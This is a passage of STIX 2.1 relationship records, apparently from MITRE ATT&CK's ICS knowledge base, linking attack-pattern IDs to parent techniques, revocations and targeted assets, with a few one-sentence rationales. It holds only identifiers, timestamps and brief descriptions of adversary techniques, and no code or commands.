{"type": "relationship", "spec_version": "2.1", "id": "relationship--23dac679-c865-49d6-8e44-06014515cecb", "created": "2020-03-09T14:51:11.860Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", "target_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2452cc82-6ee0-4a98-a213-d5e3f3247e07", "created": "2023-09-28T20:25:47.357Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:25:47.357Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--24793eaf-f0d8-4baf-ba3d-900b87cf464d", "created": "2024-04-09T21:00:24.049Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T21:00:24.049Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--24d17e8f-0c0f-41d1-aa83-8b69b8d30be5", "created": "2023-09-29T17:07:55.738Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:07:55.738Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--24e1f6cf-44c3-4a3f-9839-5cd6398cc0fe", "created": "2023-09-28T20:10:06.838Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:10:06.838Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--25003c87-d031-4f1b-8204-9223f7426d28", "created": "2020-01-24T18:15:06.961Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e", "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--250212f0-a149-4a14-af83-94f7fcedc021", "created": "2023-09-28T20:26:29.934Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:26:29.934Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--25281488-be20-4d83-89d1-1da7ea836037", "created": "2023-09-29T17:40:47.898Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:40:47.898Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--25ca7826-9f46-45e4-97e8-c942f9a2611d", "created": "2020-02-04T12:55:04.101Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--ba8e391f-14b5-496f-81f2-2d5ecd646c1c", "target_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--26d64c06-c277-473d-94e8-e9990b6adc8e", "created": "2020-03-13T20:26:49.676Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--271d1f0f-ee52-4d13-aa66-d26d277eeac7", "created": "2024-05-22T17:17:03.985Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T00:46:31.492Z", "description": "Asset Mapping Rationale: Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations.", "relationship_type": "targets", "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--27660798-1099-4bc7-9496-2b07de076f67", "created": "2020-03-12T20:43:54.110Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd", "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--27fcfb28-a452-42fe-b33e-0bb76550e883", "created": "2020-01-10T03:43:37.373Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3", "target_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--284aadab-ec10-4869-8bdb-7258c19432c4", "created": "2020-03-14T23:08:20.407Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--287b247f-8ec3-4d8d-a521-050ac8c791ad", "created": "2023-09-29T18:05:32.443Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:05:32.443Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--287b6305-0592-4843-a12b-57f96741a36e", "created": "2020-01-14T01:34:10.663Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591", "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--289c43cc-3b61-4b33-8af7-3010c94b6467", "created": "2021-11-22T15:02:15.267Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-05-24T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99", "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--28d5ada2-11de-4aad-a485-8c5aaa1f561b", "created": "2024-05-23T04:19:55.543Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T00:49:05.222Z", "description": "Asset Mapping Rationale: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI.", "relationship_type": "targets", "source_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--28e89bca-04a2-462f-9d84-d5dc4d55d98e", "created": "2023-09-28T21:26:47.115Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:26:47.115Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--29284c62-45b2-4650-88ac-fea62ddcd829", "created": "2020-01-24T17:00:00.074Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35", "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--296375b0-817d-4f42-afe1-4308f5edf973", "created": "2023-09-28T21:10:25.193Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:10:25.193Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--29c2757d-c5f6-4c8d-bbdd-3629cb14dd81", "created": "2023-09-29T18:46:39.854Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:46:39.854Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2a2007d0-4bdc-4013-8cb0-8d01c9e34b3d", "created": "2020-03-02T14:27:01.155Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", "target_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2a451896-81aa-4eed-a444-4d04661adeeb", "created": "2023-09-29T16:43:42.911Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:43:42.911Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2aaa6840-47fc-455c-9b19-1d27c3afccbe", "created": "2023-09-28T19:38:46.361Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:38:46.361Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2b0cee22-5ba7-46a1-9247-5213eacdf4d5", "created": "2024-05-22T17:24:39.733Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T00:54:09.266Z", "description": "Asset Mapping Rationale: Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation.", "relationship_type": "targets", "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2b33ca7e-3b33-44db-9479-1bba85e76902", "created": "2020-03-16T16:06:08.420Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2b40427a-1649-4316-baae-860bfad1d05c", "created": "2024-05-22T17:19:37.261Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T00:58:29.486Z", "description": "Asset Mapping Rationale: Adversaries may compromise a network device\u2019s encryption capability in order to bypass encryption that would otherwise protect data communications. Adversaries can compromise and manipulate devices that perform encryption of network traffic.", "relationship_type": "targets", "source_ref": "attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2b7d57d7-3802-4b59-99c6-1e1597fe78d1", "created": "2023-09-29T18:46:54.684Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:46:54.684Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2ba17ab3-f9ae-4052-a7c7-b6d0e10b8b96", "created": "2020-03-02T14:27:49.482Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--cc1e737c-236c-4e3b-83ba-32039a626ef8", "target_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2bb931c2-d3ae-4956-aba7-6e42c46cdc5a", "created": "2020-03-27T21:32:21.863Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071", "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2bbcc7da-f535-4974-bc08-4edb5a235828", "created": "2020-10-02T17:05:43.684Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f", "target_ref": "attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2bd00c10-dace-4747-931e-67915d9aab7d", "created": "2020-03-09T14:12:31.550Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2c2fc4fc-1c2d-4a97-871e-fe65ee8c9d7c", "created": "2020-01-24T14:27:29.047Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--bb0e0cb5-f3e4-4118-a4cb-6bf13bfbc9f2", "target_ref": "attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2c4c8178-d95a-4e5c-a9e0-e5fd52f5621b", "created": "2020-10-02T15:46:24.764Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--e3b168bd-fcd7-439e-9382-2e6c2f63514d", "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2c78a913-5b17-4942-a6e9-8bfa4c24149b", "created": "2020-03-14T23:23:41.917Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2c79920a-f2d1-4114-a1df-924835da645c", "created": "2023-09-28T19:53:00.672Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:53:00.672Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2cea4c8c-4b22-4656-8e4e-fc52555f7b22", "created": "2023-09-29T15:28:43.010Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T15:28:43.010Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--887274fc-2d63-4bdc-82f3-fae56d1d5fdc", "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2cf3d3a5-85ab-43d9-8462-684469f79c6a", "created": "2020-03-14T23:29:19.766Z", "created_by_ref": 